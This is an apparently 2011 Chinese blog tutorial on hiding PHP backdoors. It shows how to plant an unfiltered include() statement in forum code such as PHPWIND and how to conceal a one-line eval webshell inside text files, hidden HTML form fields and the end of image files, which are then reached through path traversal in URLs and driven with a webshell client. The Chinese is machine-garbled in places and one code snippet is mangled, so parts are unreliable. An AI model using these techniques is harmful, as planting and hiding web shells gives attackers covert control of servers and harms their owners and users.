松哥教你 隐藏PHP文件后门的技巧
(2011-12-25 19:40:52)
标签:
it
分类:
php
要知道假如光把PHP语句放到图片里是无论如何也不能履行的,由于PHP只解析扩大名为php的文件。所以说要能使暗躲在图片里的PHP语句履行。我们就的借助PHP中的调用函数
:include 、require 等。
我们还记得前些日子把木马暗躲到图片的文章吧。也就是在PHP文件里用include('x.gif')这样的语句来调用暗躲在图片的木马语句。ASP
中语句也类似。看似非常隐躲但直接调用图片对稍微懂点PHP的人就不难发明可疑之处。由于URL
里用GET方法很难传递参数,这就使得插进木马的性能得不到施展。
include
函数在PHP中应用的比拟频繁,所以引起的安全标题也实在太多,例如PHPWIND1.36的漏洞就是由于include后面的变量没做过滤引起的。由此
我们就可以结构类似的语句来插进到PHP文件中。然后把木马暗躲到图片或HTML文件里,可以说隐躲性就更高了。如在PHPWIND论坛里插进下面的语
句:<‘’?@include includ/.$PHPWIND_ROOT;? <mailto:?@include
'includ/'.$PHPWIND_ROOT;?>> 一般治理员是无法看出来的。
有了include 函数来帮助帮忙我们就可以把PHP木马暗躲到 诸如
txt、html和图片文件等很多类型的文件里来了。由于txt、html和图片文件这三种类型的文件最无论在论坛还是文章系统里是最为常见的了,下面我们就依次来做测试。
首先建立一PHP文件test.php 文件内容为:
<?php
$test=$_GET['test'];
@include 'test/'.$test;
?>
Txt文件一般都是阐明文件,所以我们把一句话木马放到目录的阐明文件里就OK了。随便建立一个TXT文件t.txt。我们把一句话木马
<?eval_r($_POST[cmd]);?>粘贴到t.txt文件里。然后拜访
http://localhost/test/test.php?test=../t.txt
<http://localhost/phpw/index.php?PHPWIND_ROOT=../robots.txt>
假如你看到t.txt的内容就证实Ok了, 然后把在lanker微型PHP后门客户端 木马地址添进
http://localhost/test/test.php?test=../t.txt
<http://localhost/phpw/index.php?PHPWIND_ROOT=../robots.txt>
密码里添进cmd就可以了,履行返回的成果都可以看到。
对于HTML的文件,一般都为模版文件。为了使插进到HTML的文件的木马
能被调用履行而且不被显示出来,我们可以在HTML里参加一个暗躲属性的文本框 ,如:<input type=hidden
value='<?eval_r($_POST[cmd]);?>'> 然后应用方法同上。履行的返回成果一般都可以查看源文件看到。
如应用查看本程序目录功效。查看源文件内容为 <input type=hidden
value='C:\Uniserver2_7s\www\test'> 我可以得到目录为
C:\Uniserver2_7s\www\test。
下面我们说说图片文件,要说最为毒的一招莫过于把木马暗躲到图片里。我们可以直接对一个图片进行编纂,把<?eval_r($_POST[cmd]);?>插进到图片末尾。
经测试一般都不会对图片造成影响。然后同样方法客户端木马地址添进
<http://localhost/test/test.php?test=../1.jpg>
我们查看PHP环境变量 返回的是成果是原图片。
这里可能要和我们想象的成果有些差距了,实在命令已经运行了,只是返回的成果看不到
而已,由于这是真正的GIF文件,所以是不会显示返回成果的,为了证实是否真的履行了命令我们
履行上传文件命令。果不出所料,文件已经成功上传到服务器上。这样捏造的长处是隐躲性好。毛病也自然不用说了是没回显。假如你想看到返回的成果,那就拿出
记事本捏造一个假的图片文件吧。
分享:
喜欢
0
赠金笔
加载中,请稍候......
评论加载中,请稍候...
发评论
登录名: 密码: 找回密码 注册记住登录状态
昵 称:
评论并转载此博文
发评论
以上网友发言只代表其个人观点,不代表新浪网的观点或立场。